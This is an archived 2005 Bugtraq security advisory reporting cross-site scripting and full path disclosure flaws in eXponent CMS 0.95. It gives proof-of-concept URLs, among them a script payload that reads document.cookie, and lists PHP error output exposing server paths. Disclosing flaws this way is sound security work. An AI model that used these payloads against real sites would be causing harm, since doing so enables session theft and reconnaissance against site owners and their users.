lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050125083551.27736.qmail@www.securityfocus.com>
Date: 25 Jan 2005 08:35:51 -0000
From: Ahmad Muammar <y3dips@...o.or.id>
To: bugtraq@...urityfocus.com
Subject: Vulnerabilities in eXponent 0.95




ECHO_ADV_02$2004

---------------------------------------------------------------------------
                      Vulnerabilities in eXponent
---------------------------------------------------------------------------

Author: y3dips
Date: Januari, 25th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv010-y3dips-2005.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exponent Content Management System


Exponent is an exciting new web-based content management system. It makes
creating and maintaining websites easy for non-technical users, while
providing site managers the power and flexibility to add new features,
completely customize the layout, and delegate responsibilities to other
users.

by: James Hunt and the OIC Group

http://www.exponentcms.org

Version :
 - Stable version of 0.95 Exponent CMS.

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Cross-site scripting aka XSS:

A1 - XSS through unsanitaized user submitted in module variable

http://[SITE]/expo/index.php?action=view&id=2&module=<h1>Tes</h1>

POC : http://[SITE]/expo/index.php?action=view&id=2&module=<h1>Tes</h1>


A2. Session ID at module Variable

http://[SITE]/endon/mod.php?action=[BLABLA]&module=[XSS]

POC :

http://[SITE]/expo/index.php?action=createuser&module=%3Cscript%3Ealert(document.cookie)%3C/script%3E


B. Full Path disclosures

Some scripts in subsystems directories are vulnerable against direct access
and we will see standard php error messages revealing full path to script

This vulnerable is because undeffined pathos_core_version variable ,
and the vulnerable files has the same format name (:)~)

    ---.info.---.php


POC : http://localhost/expo/subsystems/search.info.php

Fatal error: Call to undefined function: pathos_core_version() in
/var/www/html/expo/subsystems/search.info.php on line 52

POC :

http://localhost/expo/subsystems/permissions.info.php


POC :
http://localhost/expo/subsystems/security.info.php

Fatal error: Call to undefined function: pathos_core_version() in
/var/www/html/expo/subsystems/security.info.php on line 51

Fatal error: Call to undefined function: pathos_core_version() in
/var/www/html/expo/subsystems/permissions.info.php on line 51

Another vulnerable path

- http://localhost/expo/sdk/blanks/formcontrol.php
- http://localhost/expo/sdk/blanks/file_modules.php


---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ echo|staff (m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32)
~ newbie_hacker@...oogroups.com ,
~ #e-c-h-o@...NET

---------------------------------------------------------------------------
Contact:
~~~~~~~~

     y3dips || echo|staff || y3dips[at]gmail[dot]com
     Homepage: http://y3dips.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ